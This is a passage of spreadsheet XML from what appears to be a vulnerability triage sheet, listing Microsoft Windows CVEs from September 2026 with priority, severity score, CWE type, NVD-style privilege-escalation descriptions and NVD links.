      <c r="C957" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69605</t>
        </is>
      </c>
      <c r="D957" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E957" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F957" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G957" s="5" t="inlineStr"/>
      <c r="H957" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I957" s="5" t="inlineStr"/>
      <c r="J957" s="5" t="inlineStr"/>
      <c r="K957" s="5" t="inlineStr"/>
      <c r="L957" s="5" t="inlineStr"/>
      <c r="M957" s="5" t="inlineStr"/>
      <c r="N957" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O957" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P957" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q957" s="5" t="inlineStr"/>
      <c r="R957" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S957" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Install Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T957" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69605</t>
        </is>
      </c>
    </row>
    <row r="958">
      <c r="A958" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B958" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C958" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69606</t>
        </is>
      </c>
      <c r="D958" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E958" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F958" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G958" s="5" t="inlineStr"/>
      <c r="H958" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I958" s="5" t="inlineStr"/>
      <c r="J958" s="5" t="inlineStr"/>
      <c r="K958" s="5" t="inlineStr"/>
      <c r="L958" s="5" t="inlineStr"/>
      <c r="M958" s="5" t="inlineStr"/>
      <c r="N958" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O958" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P958" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q958" s="5" t="inlineStr"/>
      <c r="R958" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S958" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T958" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69606</t>
        </is>
      </c>
    </row>
    <row r="959">
      <c r="A959" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B959" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C959" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69610</t>
        </is>
      </c>
      <c r="D959" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E959" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F959" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G959" s="5" t="inlineStr"/>
      <c r="H959" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I959" s="5" t="inlineStr"/>
      <c r="J959" s="5" t="inlineStr"/>
      <c r="K959" s="5" t="inlineStr"/>
      <c r="L959" s="5" t="inlineStr"/>
      <c r="M959" s="5" t="inlineStr"/>
      <c r="N959" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O959" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P959" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q959" s="5" t="inlineStr"/>
      <c r="R959" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S959" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T959" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69610</t>
        </is>
      </c>
    </row>
    <row r="960">
      <c r="A960" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B960" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C960" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69611</t>
        </is>
      </c>
      <c r="D960" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E960" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F960" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G960" s="5" t="inlineStr"/>
      <c r="H960" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I960" s="5" t="inlineStr"/>
      <c r="J960" s="5" t="inlineStr"/>
      <c r="K960" s="5" t="inlineStr"/>
      <c r="L960" s="5" t="inlineStr"/>
      <c r="M960" s="5" t="inlineStr"/>
      <c r="N960" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O960" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P960" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q960" s="5" t="inlineStr"/>
      <c r="R960" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S960" s="5" t="inlineStr">
        <is>
          <t>Use after free in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T960" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69611</t>
        </is>
      </c>
    </row>
    <row r="961">
      <c r="A961" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B961" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C961" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69613</t>
        </is>
      </c>
      <c r="D961" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E961" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F961" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G961" s="5" t="inlineStr"/>
      <c r="H961" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I961" s="5" t="inlineStr"/>
      <c r="J961" s="5" t="inlineStr"/>
      <c r="K961" s="5" t="inlineStr"/>
      <c r="L961" s="5" t="inlineStr"/>
      <c r="M961" s="5" t="inlineStr"/>
      <c r="N961" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O961" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P961" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q961" s="5" t="inlineStr"/>
      <c r="R961" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S961" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T961" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69613</t>
        </is>
      </c>
    </row>
    <row r="962">
      <c r="A962" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B962" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C962" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69617</t>
        </is>
      </c>
      <c r="D962" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E962" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F962" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G962" s="5" t="inlineStr"/>
      <c r="H962" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I962" s="5" t="inlineStr"/>
      <c r="J962" s="5" t="inlineStr"/>
      <c r="K962" s="5" t="inlineStr"/>
      <c r="L962" s="5" t="inlineStr"/>
      <c r="M962" s="5" t="inlineStr"/>
      <c r="N962" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O962" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P962" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q962" s="5" t="inlineStr"/>
      <c r="R962" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S962" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T962" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69617</t>
        </is>
      </c>
    </row>
    <row r="963">
      <c r="A963" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B963" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C963" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69621</t>
        </is>
      </c>
      <c r="D963" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E963" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F963" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G963" s="5" t="inlineStr"/>
      <c r="H963" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I963" s="5" t="inlineStr"/>
      <c r="J963" s="5" t="inlineStr"/>
      <c r="K963" s="5" t="inlineStr"/>
      <c r="L963" s="5" t="inlineStr"/>
      <c r="M963" s="5" t="inlineStr"/>
      <c r="N963" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O963" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P963" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q963" s="5" t="inlineStr"/>
      <c r="R963" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S963" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T963" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69621</t>
        </is>
      </c>
    </row>
    <row r="964">
      <c r="A964" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B964" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C964" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69630</t>
        </is>
      </c>
      <c r="D964" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E964" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F964" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G964" s="5" t="inlineStr"/>
      <c r="H964" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I964" s="5" t="inlineStr"/>
      <c r="J964" s="5" t="inlineStr"/>
      <c r="K964" s="5" t="inlineStr"/>
      <c r="L964" s="5" t="inlineStr"/>
      <c r="M964" s="5" t="inlineStr"/>
      <c r="N964" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O964" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P964" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q964" s="5" t="inlineStr"/>
      <c r="R964" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S964" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T964" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69630</t>
        </is>
      </c>
    </row>
    <row r="965">
      <c r="A965" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B965" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C965" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69645</t>
        </is>
      </c>
      <c r="D965" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E965" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F965" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G965" s="5" t="inlineStr"/>
      <c r="H965" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I965" s="5" t="inlineStr"/>
      <c r="J965" s="5" t="inlineStr"/>
      <c r="K965" s="5" t="inlineStr"/>
      <c r="L965" s="5" t="inlineStr"/>
      <c r="M965" s="5" t="inlineStr"/>
      <c r="N965" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O965" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P965" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q965" s="5" t="inlineStr"/>
      <c r="R965" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S965" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T965" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69645</t>
        </is>
      </c>
    </row>
    <row r="966">
      <c r="A966" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B966" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C966" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69648</t>
        </is>
      </c>
      <c r="D966" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E966" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F966" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G966" s="5" t="inlineStr"/>
      <c r="H966" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I966" s="5" t="inlineStr"/>
      <c r="J966" s="5" t="inlineStr"/>
      <c r="K966" s="5" t="inlineStr"/>
      <c r="L966" s="5" t="inlineStr"/>
      <c r="M966" s="5" t="inlineStr"/>
      <c r="N966" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O966" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P966" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q966" s="5" t="inlineStr"/>
      <c r="R966" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S966" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Notification allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T966" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69648</t>
        </is>
      </c>
    </row>
    <row r="967">
      <c r="A967" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B967" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C967" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69652</t>
        </is>
      </c>
      <c r="D967" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E967" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F967" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G967" s="5" t="inlineStr"/>
      <c r="H967" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I967" s="5" t="inlineStr"/>
      <c r="J967" s="5" t="inlineStr"/>
      <c r="K967" s="5" t="inlineStr"/>
      <c r="L967" s="5" t="inlineStr"/>
      <c r="M967" s="5" t="inlineStr"/>
      <c r="N967" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O967" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P967" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q967" s="5" t="inlineStr"/>
      <c r="R967" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S967" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T967" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69652</t>
        </is>
      </c>
    </row>
    <row r="968">
      <c r="A968" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B968" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C968" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69654</t>
        </is>
      </c>
      <c r="D968" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E968" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F968" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G968" s="5" t="inlineStr"/>
      <c r="H968" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I968" s="5" t="inlineStr"/>
      <c r="J968" s="5" t="inlineStr"/>
      <c r="K968" s="5" t="inlineStr"/>
      <c r="L968" s="5" t="inlineStr"/>
      <c r="M968" s="5" t="inlineStr"/>
      <c r="N968" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O968" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P968" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q968" s="5" t="inlineStr"/>
      <c r="R968" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S968" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T968" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69654</t>
        </is>
      </c>
    </row>
    <row r="969">
      <c r="A969" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B969" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C969" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69682</t>
        </is>
      </c>
      <c r="D969" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E969" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F969" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G969" s="5" t="inlineStr"/>
      <c r="H969" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I969" s="5" t="inlineStr"/>
      <c r="J969" s="5" t="inlineStr"/>
      <c r="K969" s="5" t="inlineStr"/>
      <c r="L969" s="5" t="inlineStr"/>
      <c r="M969" s="5" t="inlineStr"/>
      <c r="N969" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O969" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P969" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q969" s="5" t="inlineStr"/>
      <c r="R969" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S969" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Host Guardian Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T969" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69682</t>
        </is>
      </c>
    </row>
    <row r="970">
      <c r="A970" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B970" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C970" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69692</t>
        </is>
      </c>
      <c r="D970" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E970" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F970" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G970" s="5" t="inlineStr"/>
      <c r="H970" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I970" s="5" t="inlineStr"/>
      <c r="J970" s="5" t="inlineStr"/>
      <c r="K970" s="5" t="inlineStr"/>
      <c r="L970" s="5" t="inlineStr"/>
      <c r="M970" s="5" t="inlineStr"/>
      <c r="N970" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O970" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P970" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q970" s="5" t="inlineStr"/>
      <c r="R970" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S970" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T970" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69692</t>
        </is>
      </c>
    </row>
    <row r="971">
      <c r="A971" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B971" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C971" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69693</t>
        </is>
      </c>
      <c r="D971" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E971" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F971" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G971" s="5" t="inlineStr"/>
      <c r="H971" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I971" s="5" t="inlineStr"/>
      <c r="J971" s="5" t="inlineStr"/>
      <c r="K971" s="5" t="inlineStr"/>
      <c r="L971" s="5" t="inlineStr"/>
      <c r="M971" s="5" t="inlineStr"/>
      <c r="N971" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O971" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P971" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q971" s="5" t="inlineStr"/>
      <c r="R971" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S971" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T971" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69693</t>
        </is>
      </c>
    </row>
    <row r="972">
      <c r="A972" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B972" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C972" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69694</t>
        </is>
      </c>
      <c r="D972" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E972" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F972" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G972" s="5" t="inlineStr"/>
      <c r="H972" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="I972" s="5" t="inlineStr"/>
      <c r="J972" s="5" t="inlineStr"/>
      <c r="K972" s="5" t="inlineStr"/>
      <c r="L972" s="5" t="inlineStr"/>
      <c r="M972" s="5" t="inlineStr"/>
      <c r="N972" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O972" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P972" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q972" s="5" t="inlineStr"/>
      <c r="R972" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S972" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in Windows IP Address Management (IPAM) Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T972" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69694</t>
        </is>
      </c>
    </row>
    <row r="973">
      <c r="A973" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B973" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C973" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69708</t>
        </is>
      </c>
      <c r="D973" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E973" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F973" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G973" s="5" t="inlineStr"/>
      <c r="H973" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I973" s="5" t="inlineStr"/>
      <c r="J973" s="5" t="inlineStr"/>
      <c r="K973" s="5" t="inlineStr"/>
      <c r="L973" s="5" t="inlineStr"/>
      <c r="M973" s="5" t="inlineStr"/>
      <c r="N973" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O973" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P973" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q973" s="5" t="inlineStr"/>
      <c r="R973" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S973" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Web Platform Storage allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T973" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69708</t>
        </is>
      </c>
    </row>
    <row r="974">
      <c r="A974" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B974" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C974" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69711</t>
        </is>
      </c>
      <c r="D974" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E974" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F974" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G974" s="5" t="inlineStr"/>
      <c r="H974" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I974" s="5" t="inlineStr"/>
      <c r="J974" s="5" t="inlineStr"/>
      <c r="K974" s="5" t="inlineStr"/>
      <c r="L974" s="5" t="inlineStr"/>
      <c r="M974" s="5" t="inlineStr"/>
      <c r="N974" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O974" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P974" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q974" s="5" t="inlineStr"/>
      <c r="R974" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S974" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T974" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69711</t>
        </is>
      </c>
    </row>
    <row r="975">
      <c r="A975" s="5" t="inlineStr">
        <is>
